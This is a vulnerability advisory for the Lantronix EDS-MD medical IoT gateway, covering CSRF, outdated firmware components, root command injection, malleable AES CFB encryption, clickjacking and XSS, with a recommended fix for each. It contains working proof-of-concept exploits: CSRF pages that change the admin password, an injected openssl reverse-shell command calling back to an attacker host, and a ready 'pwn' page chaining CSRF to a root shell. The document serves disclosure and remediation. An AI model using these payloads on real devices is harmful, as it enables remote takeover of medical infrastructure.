Multiple vulnerabilities in Lantronix EDS-MD IoT gateway for medical devices

Summary

The web interface of the Lantronix box is not protected against Cross-Site Request Forgery attacks. No CVE has been assigned to this vulnerability yet.

Impact

If the preconditons are met, the attacker could indirectly do all actions that are available on the Lantronix IoT gateway such as enabling SSH/Telnet, changing the password, disabling authentication, uploading files or exploit the command injection vulnerability documented in this advisory to execute unrestricted commands as root on the Linux operating system.

Technical details

An attacker could host the following HTML code on his website.

<html>
<body>
The author of this code is not responsible for any damage caused by the use or misuse of this PoC exploit. This PoCs is intended for educational and research purposes only, and should never be used to target or exploit systems without explicit permission from the owner.
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/192.168.183.43\/fs", true);
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundaryoD0vrnoSvVP2UbaB");
xhr.withCredentials = true;
var body = "------WebKitFormBoundaryoD0vrnoSvVP2UbaB\r\n" +
"Content-Disposition: form-data; name=\"cwd\"\r\n" +
"\r\n" +
"/\r\n" +
"------WebKitFormBoundaryoD0vrnoSvVP2UbaB\r\n" +
"Content-Disposition: form-data; name=\"selectedfile\"; filename=\"test.txt\"\r\n" +
"Content-Type: text/plain\r\n" +
"\r\n" +
"fooo\r\n" +
"------WebKitFormBoundaryoD0vrnoSvVP2UbaB\r\n" +
"Content-Disposition: form-data; name=\"iehack\"\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundaryoD0vrnoSvVP2UbaB\r\n" +
"Content-Disposition: form-data; name=\"submit\"\r\n" +
"\r\n" +
"Upload\r\n" +
"------WebKitFormBoundaryoD0vrnoSvVP2UbaB--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
submitRequest();
</script>
</body>
</html>

After an administrator who is currently logged-in on the Lantronix box on 192.168.183.43 (example IP address) visits the attacker's website, a new file was uploaded called test.txt.

Another example is the following code, which changes the administrator's password to "bbb" and enables SSH and Telnet:

<html>
<body>
The author of this code is not responsible for any damage caused by the use or misuse of this PoC exploit. This PoCs is intended for educational and research purposes only, and should never be used to target or exploit systems without explicit permission from the owner.
<form action="http://192.168.183.43/" method="POST">
<input type="hidden" name="ajax" value="CliConfigPost" />
<input type="hidden" name="new&#95;Cli&#46;Login&#95;Password" value="bbb" />
<input type="hidden" name="new&#95;Cli&#46;Enable&#95;Level&#95;Password" value="" />
<input type="hidden" name="new&#95;Cli&#46;Quit&#95;Connect&#95;Line" value="&lt;control&gt;L" />
<input type="hidden" name="new&#95;Cli&#46;Inactivity&#95;Timeout" value="15" />
<input type="hidden" name="new&#95;Cli&#46;Line&#95;Authentication" value="Enabled" />
<input type="hidden" name="new&#95;CliTelnet&#46;State" value="Enabled" />
<input type="hidden" name="new&#95;CliTelnet&#46;Port" value="23" />
<input type="hidden" name="new&#95;CliTelnet&#46;Max&#95;Sessions" value="3" />
<input type="hidden" name="new&#95;CliTelnet&#46;Authentication" value="Disabled" />
<input type="hidden" name="new&#95;CliSsh&#46;State" value="Enabled" />
<input type="hidden" name="new&#95;CliSsh&#46;Port" value="22" />
<input type="hidden" name="new&#95;CliSsh&#46;Max&#95;Sessions" value="3" />
<input type="hidden" name="confirms" value="" />
<input type="hidden" name="submit" value="Submit" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>

The exploit works as Lantronix use browser-supplied authentication (no authentication, basic authentication or digest authentication). The browser will add the required authentication information to every request.

While this kind of attack used to work with cookie-based authentication, modern browsers protect cookies with the SameSite flag by default, making Cross-Site Request Forgery impossible in many cases. However, Lantronix does not use cookie-based authentication.

Precondition

Cross-Site Request Forgery have multiple preconditions. An attacker has to know the IP address or DNS name of the Lantronix box he would like to attack. Additionally, an administrator who is currently logged-in at the Lantronix box has to visit the attacker's website, where the prepared HTML/JavaScript code is hosted. However, as the request is not visible to the attacked user, an attacker could send such requests to entire ranges of IP addresses. An attacker also needs to implement its own pingback when a successful exploitation happens, as the Same-Origin-Policy prevents reading if an attack succeeded from the attacker's origin.

Recommendation

It is recommended for Lantronix to:

• Include a non-predictable Cross-Site Request Forgery token in every POST request (state changing requests) on the Lantronix IoT gateway and validate the token before accepting the request.

• As the Lantronix web server is stateless (no sessions), an alternative mechanism that proofs the non-cross-site-origin could be used. For example, the "Naive Double Submit Cookie" approach could be used. In this scenario, all requests are preprocessed in browser-side JavaScript and sending a non-predictable token (e.g. newly generated long random token) in the POST data and the same token in an HTTP cookie. The web server verifies for all POST requests, that the value in the HTTP cookie header and the POST data matches and otherwise reject the request. As cross-origin requests are not allowed to set arbitrary HTTP cookies for the target domain, such a mechanism proofs the same-origin.

Please note, as Lantronix uses basic or digest browser-based authentication (and not cookie based), the modern prevention mechanism of SameSite cookies flags do not apply, but the flag could be set in the "Naive Double Submit Cookie" approach.

Summary

The Lantronix IoT gateway uses outdated software with known vulnerabilities.

Impact

The various vulnerabilities have different impacts that have not been analysed in-depth, but it is estimated that there are vulnerabilities that have an impact.

Technical details

The latest release of the gateway OS for the Lantronix IoT gateway at the time of testing was version 8.4.0.0R1 and can be downloaded on the Lantronix Confluence page.

The firmware was released in 2022. However, the firmware (Linux OS) includes various different software pieces that are much older, for example:

• BusyBox v1.16.1

• CLIENT libcurl 7.36.0

• EXT2FS Library version 1.41.11

• GNU C Library (Sourcery G++ Lite 2009q1-203) stable release version 2.8

• GNU sed version 4.0

• Linux-2.6.31

• Modern traceroute for Linux, version 2.0.18

• OpenSSL 1.0.2i

• SERVER: UPnP/1.1 MiniUPnPd/1.9

• dnsmasq-2.70

• dosfsck 3.0.3

• ethtool version 6

• iperf version 2.0.5

• libcurl/7.36.0

• libpcap version 1.0.0

• libpcre.so.0.0.1

• lspci version 3.1.7

• ltrace version 0.5.

• nginx version: nginx/1.6.1

• setpci version 3.1.7

• udhcp 1.16.1

• vsftpd: version 2.0.7

For example, OpenSSL 1.0.2 is out of support since 1st January 2020 and is no longer receiving updates.

As another example, the firmware uses the webserver nginx in version 1.6.1 which was released in August 2014. This version of nginx is vulnerable to the following issues:

• CVE-2014-3616

• CVE-2016-0747

• CVE-2016-0746

• CVE-2016-0742

• CVE-2016-4450

• CVE-2017-7529

• CVE-2018-16845

• CVE-2021-23017

• CVE-2022-41742

• CVE-2022-41741

The Linux kernel was released 14 years ago in 2009 and has many vulnerabilities published.

As there is no point in searching further for vulnerabilities in a manual way, the EMBA firmware analyser was used and printed the following summary:

[+] Identified 1779 CVE entries.
    Identified 547 High rated CVE entries / Exploits: 194
    Identified 1051 Medium rated CVE entries / Exploits: 177
    Identified 181 Low rated CVE entries /Exploits: 25
    396 possible exploits available (13 Metasploit modules).
    Remote exploits: 4 / Local exploits: 35 / DoS exploits: 14 /
    Github PoCs: 307 / Known exploited vulnerabilities: 6 / Verified Exploits: 0

Pentagrid did not confirm if any of the issues are exploitable on the Lantronix IoT gateway.

Precondition

One of the vulnerabilities has to be exploitable to have an impact on the security of the Lantronix IoT gateway.

Recommendation

It is recommended for Lantronix to:

• Update components of the firmware on a regular basis and keep the latest firmware release up to date.

Summary

A user who has access to the Lantronix web interface can execute arbitrary commands as root on the underlying Linux machine. No CVE has been assigned to this vulnerability yet.

Impact

Users on the web interface can circumvent the Lantronix enable command and the restricted shell access to gain full root command execution on the underlying Linux machine. It allows full access to all binaries and therefore simplifies reverse engineering how Lantronix operates the device or to find other security issues. For example, the user's password can be found in cleartext in a file called /ltrx_private/cfg/hidden.config on the internal filesystem.

Technical details

The functionality to generate new TLS certificate is prone to command injection:

POST / HTTP/1.1
Host: 192.168.183.43
Content-Length: 174
Authorization: Basic REDACTED
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://192.168.183.43
Referer: http://192.168.183.43/?x=k8pgpswk
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close

ajax=SslGenerateCertificate&c=ch&s=bb&l=bb&o=bb&ou=bb&cn=bbbbbbb'||ping -c 1 192.168.183.11 #&expires=01%2F01%2F2026&keytype=DSA&bits=512&submit=Submit&sslcredentialname=abbb

The IP address 192.168.183.11 will then receive ICMP requests (pings), meaning the ping command was executed on the device.

By using the openssl command that is on the device and used to create a certificate, we can achieve a remote shell to fully access the Lantronix device as Linux user root:

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.183.11:4444 > /tmp/s; rm /tmp/s

Or as an HTTP request:

POST / HTTP/1.1
Host: 192.168.183.43
Content-Length: 493
Authorization: Basic REDACTED
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://192.168.183.43
Referer: http://192.168.183.43/?x=k8pgpswk
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close

ajax=SslGenerateCertificate&c=ch&s=bb&l=bb&o=bb&ou=bb&cn=bbbbbbb'|| %6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%73%3b%20%2f%62%69%6e%2f%73%68%20%2d%69%20%3c%20%2f%74%6d%70%2f%73%20%32%3e%26%31%20%7c%20%6f%70%65%6e%73%73%6c%20%73%5f%63%6c%69%65%6e%74%20%2d%71%75%69%65%74%20%2d%63%6f%6e%6e%65%63%74%20%31%39%32%2e%31%36%38%2e%31%38%33%2e%31%31%3a%34%34%34%34%20%3e%20%2f%74%6d%70%2f%73%3b%20%72%6d%20%2f%74%6d%70%2f%73 #&expires=01%2F01%2F2026&keytype=DSA&bits=512&submit=Submit&sslcredentialname=abbb

On the attacker side we just have to listen for the back-connect and then get an interactive shell:

attacker% ncat --ssl -vv -l -p 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: C86D 6F63 B9C0 9050 9A51 A7F3 D8F9 748D 22F4 F497
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.183.43.
Ncat: Connection from 192.168.183.43:34902.
/bin/sh: can't access tty; job control turned off
/ # ls
bin
boot
config
defaults
dev
etc
home
http
lib
linuxrc
lost+found
ltrx_private
ltrx_user
mnt
opt
proc
root
sbin
sys
tmp
usr
var
/ # whoami
root
/ # pwd
/

From this perspective we can see how the injection took place as the subprocess is still running (the HTTP request never returned a response):

/ # ps waux
PID USER COMMAND
1 root init
2 root [kthreadd]
[...]
580 root /sbin/getty -L ttyS0 115200 vt100
604 root /bin/sh /etc/init.d/S71ntpd start
631 root /bin/fwupgrade -c -l -r -s -w -f /tmp/firmware.rom -b E6
647 root /usr/sbin/inetd -f /etc/inetd.conf
658 root /bin/emaild
659 root /bin/alarmd
715 root nginx: master process nginx -c /etc/nginx.conf
[...]
727 root /bin/pw_fuse_fs /ltrx_user/pwxcr -o allow_other
1043 root udhcpc --interface=eth0 -t 5 -A 10 -S -s /usr/share/udhcpc/ltrx-dhcp.script -p /var/run/udhcpc.eth0.pid -i eth0
1063 default avahi-autoipd: [eth0] sleeping
1064 root avahi-autoipd: [eth0] callout dispatcher
4635 root sh -c openssl req -x509 -nodes -days 20448 -subj '/C=ch/ST=bb/L=bb/O=bb/OU=bb/CN=bbbbbbb'|| mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.183.11:4444 > /tmp/s; rm /tmp/s #' -set_serial 2 -newkey dsa:/tmp/ssl_dsaparams_12431_12451 -keyout /tmp/ssl_12431_12451.key -out /tmp/ssl_12431_12451
4656 root /bin/sh -i
4657 root openssl s_client -quiet -connect 192.168.183.11 4444
5573 root /bin/sh /etc/init.d/S71ntpd start
5577 root /usr/sbin/ntpd -p 0.pool.ntp.org
5578 root ps waux
12431 root /bin/ltrx_evo
29657 root /sbin/syslogd -L -n -l 7 -m 0 -C512 -O /ltrx_user/log.txt -s 500 -b 0
29658 root /sbin/klogd -n -c 1

This also leads to the conclusion that the web server is running as root like all other processes.

The following proof of concept HTML code can be used to demonstrate this issue and the Cross-Site Request Forgery (see finding 1) combined:

<html>
<body>
This is a Proof of Concept exploit for two vulnerabilities in Lantronix EDS-MD: A generic Cross-Site Request Forgery combined with an authenticated command injection. The author of this code is not responsible for any damage caused by the use or misuse of this PoC exploit. This PoCs is intended for educational and research purposes only, and should never be used to target or exploit systems without explicit permission from the owner.<br>
Steps to pwn:<br>
1) Log into Lantronix in this browser in another tab<br>
2) Enter the URL of the Lantronix box as a target below<br>
3) Start reverse shell on your computer with "ncat --ssl -vv -l -p 4444" (ncat is part of <a href="https://nmap.org/ncat/">nmap</a>)<br>
4) Enter your reserve shell IP below<br>
5) Press the submit button<br>
Reverse shell IP (your IP): <input type="text" name="target" id="reverseip" value="192.168.1.99"><br>
Target Lantronix box: <input type="text" name="target" id="target" value="http://192.168.1.98/"><br>
<form action="http://192.168.1.12/" method="POST">
<input type="hidden" name="ajax" value="SslGenerateCertificate" />
<input type="hidden" name="c" value="ch" />
<input type="hidden" name="s" value="bb" />
<input type="hidden" name="l" value="bb" />
<input type="hidden" name="o" value="bb" />
<input type="hidden" name="ou" value="bb" />
<input type="hidden" name="cn" id="payload" value="bbbbbbb&apos;&#124;&#124;&#32;mkfifo&#32;&#47;tmp&#47;s&#59;&#32;&#47;bin&#47;sh&#32;&#45;i&#32;&lt;&#32;&#47;tmp&#47;s&#32;2&gt;&amp;1&#32;&#124;&#32;openssl&#32;s&#95;client&#32;&#45;quiet&#32;&#45;connect&#32;192&#46;168&#46;1&#46;88&#58;4444&#32;&gt;&#32;&#47;tmp&#47;s&#59;&#32;rm&#32;&#47;tmp&#47;s&#32;&#35;" />
<input type="hidden" name="expires" value="01&#47;01&#47;2026" />
<input type="hidden" name="keytype" value="DSA" />
<input type="hidden" name="bits" value="512" />
<input type="hidden" name="sslcredentialname" value="abbb" />
<input type="submit" value="pwn" style="display:none" />
</form>
<form>
<input type="submit" value="pwn" />
</form>
<script>
document.forms[1].addEventListener("submit", (e) => {
e.preventDefault();
document.forms[0].action = document.getElementById('target').value;
var payload = document.getElementById('payload');
payload.value = payload.value.replace('192.168.1.88', document.getElementById('reverseip').value);
//console.log("payload: " + document.getElementById('payload').value);
//console.log("action: " + document.forms[0].action);
document.forms[0].submit();
});
</script>
</body>
</html>

Precondition

An attacker needs access to the administrative web interface.

While this is unlikely if authentication is enabled, this issue simplifies the exploitation of the Cross-Site Request Forgery issue (see finding 1), by gaining command execution on the Lantronix box via Cross-Site Request Forgery. In this case the preconditions of the Cross-Site Request Forgery apply instead.

Recommendation

It is recommended for Lantronix to:

• Avoid passing arguments to a shell or not use any shell execution at all.

• To filter user input according to an allowed-characters approach.

• To escape shell arguments correctly.

Summary

As the Lantronix IoT gateway only uses an AES CFB encryption without authentication, an attacker can manipulate data without being detected. No CVE has been assigned to this vulnerability yet.

Impact

An attacker can feed manipulated data into the receiving machine.

Technical details

No TLS is used between the Lantronix IoT gateway and the receiving end, but only AES CFB encryption.

An attacker can flip a bit in the cleartext by flipping the same bit in the ciphertext. In general, this allows arbitrary modification of the sent data.

Usually, applications will send and parse certain messages and therefore the application is coded to parse single messages. However, the underlying AES encryption will use blocks. A message might consist of several blocks.

A side effect is that the next AES block (128 bit = 16 bytes) will be randomly changed (the changes are unpredictable to the attacker as he does not know the secret key). This problem can be solved by the attacker by only modifying the last block of a message (and therefore the start of the next message would be corrupt) or by finding a place in a message, where a random corruption of the next AES block does not matter.

Precondition

An attacker has to be in a Machine-In-The-Middle (MITM) position to conduct the attack. The attacker would need to know the length of messages and locations of where a bit flip should happen. Additionally, an attacker has to correlate AES cipher blocks with application messages, so that the last block of a message is attacked or somewhere where the next block can be corrupted.

Recommendation

It is recommended for Lantronix to:

• Check if a new version of TLS or TLS-PSK could be offered to customers, which offers a full solution with many security aspects covered.

Summary

The used authentication mechanism on the Lantronix administrative web interface has disadvantages such as no working logout mechanism.

Impact

Attackers are more likely to find an authenticated browser on a compromised machine, as a logout from the Lantronix web interface is only possible by closing the browser completely.

Technical details

The Lantronix IoT gateway can use HTTP basic, digest or no authentication. HTTP digest and basic authentication is handled by the browser and there is usually no logout possible (except for closing the browser).

HTTP digest authentication is only providing little benefit over HTTP basic authentication. The much more important factor is the usage of TLS on the web interface in any case. HTTP digest authentication is weak as it uses MD5, which is a password hashing algorithm where very fast password cracking approaches are available and therefore the strength of the password has to be very high.

Precondition

An attacker first has to compromise a machine where a login to the Lantronix web interface took place or be in a MITM position to exploit the issue.

Recommendation

It is recommended for Lantronix to:

• Provide a stronger authentication method on the web interface.

Summary

The website is not protected against Clickjacking.

Impact

An attacker could load the Lantronix web interface in an iframe and make the iframe invisible, forwarding clicks by the user to the Lantronix web interface and therefore manipulate the user into taking undesired actions on the Lantronix IoT gateway's web interface.

Technical details

The Lantronix web interface does not set the X-Frame-Options or Content-Security-Policy header that would prevent clickjacking.

An attacker-controlled website can load the Lantronix website in an iframe.

Precondition

An attacker has to lure a victim who is already logged-in on the Lantronix IoT gateway onto an attacker controlled-website. The attacker has to know the URL/IP of the Lantronix web interface for the attack.

Recommendation

It is recommended for Lantronix to:

• Set the HTTP header Content-Security-Policy and prevent framing or use the X-Frame-Options header.

Summary

The file download of the Lantronix web interface is affected by a Cross-Site Scripting issue.

Impact

An attacker can mainly attack other users of the web interface, as the attacked user has to be able to download a file on the web interface. No CVE has been assigned to this vulnerability yet.

Technical details

The Lantronix web interface does not set the Content-Disposition header, which would instruct the browser to download the file rather than to interpret it in the browser. The Content-Type header is missing as well, forcing the browser to guess the Content-Type of every downloaded file:

GET /fs?file=%2Ftest.html HTTP/1.1
Host: 192.168.183.43
Cache-Control: max-age=0
Authorization: Basic REDACTED
Upgrade-Insecure-Requests: 1
Origin: http://192.168.183.43
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en;q=0.9
Connection: close
Accept: */*


HTTP/1.1 200 Ok
Server: Lantronix Web Manager
Date: Thu, 07 Sep 2023 12:01:41 GMT
Content-Length: 65
Connection: close

<html><head></head><body>this is just a little html</body></html>

Therefore, the browser will interpret HTML files as HTML. This means an attacker who can convince another user on the Lantronix web interface to download a file could execute arbitrary JavaScript in the context of that user.

Precondition

An attacker would need to attack a user who is already logged-in and at the same time the attacker has to be able to upload files to the Lantronix device. This precondition under normal circumstances is unlikely.

However, by combining this issue with the Cross-Site Request Forgery issue (see finding 1), an attacker could more easily construct a working exploit. In this case the preconditions of the Cross-Site Request Forgery apply instead.

Recommendation

It is recommended for Lantronix to:

• Set the HTTP response header Content-Disposition: attachment in the response and therefore instruct the browser to download the file instead of previewing it.

• Set a correct Content-Type HTTP response header.

• Prevent upload of file extensions that could lead to XSS.

Summary

There is no policy for the Cross-site Scripting (XSS) prevention feature Content Security Policy (CSP).

Impact

The policy could prevent XSS if an XSS occurs on the website.

Technical details

No Content Security Policy is set by the Lantronix administrative web interface.

Precondition

An attacker needs to find a XSS issue first to be able to exploit the issue that the CSP is missing.

Recommendation

It is recommended for Lantronix to:

• change the website to not require inline JavaScript or to use a nonce or hash-based approach that also allows to remove the unsafe-inline keyword. Afterwards a strong CSP can be put in place.